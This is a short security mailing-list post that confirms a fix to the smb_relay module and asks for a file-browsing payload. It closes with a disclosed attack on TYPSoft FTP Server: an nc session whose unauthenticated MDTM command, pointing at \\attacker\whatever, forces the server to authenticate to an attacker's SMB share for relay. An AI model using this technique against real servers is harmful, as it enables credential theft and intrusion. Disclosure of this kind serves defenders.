smb_relay has been fixed :-)

[nicolas.ruff at gmail.com (Nicolas RUFF)]

> I finally tracked down the bug in smb_relay, the fix has been committed to 
> the 3.2 and 3.3-dev SVN trees. A big thanks to the folks who reported it 
> and their patience waiting on a fix.

Confirmed working. Thanks a lot !

At this point, it would be very nice to have a browse/read/write files
payload rather than existing payloads that all expect the user to be
local administrator (which is quite uncommon nowadays).

A payload that would allow file browsing on a share where the user
profile is stored would be of highest interest. But I now this is not
something that could be done over the night ...


Bonus smb_relay attack against Typsoft FTP server, which
* runs in the current user session (and not as a service)
* allows unauthenticated use of the MDTM command
* does not properly filter parameters to the CreateFile API

Then:

$ nc -vv -n 192.168.1.100 21
(UNKNOWN) [192.168.1.100] 21 (?) open
220 TYPSoft FTP Server 1.11 ready...
MDTM \\attacker\whatever

Regards,
- Nicolas RUFF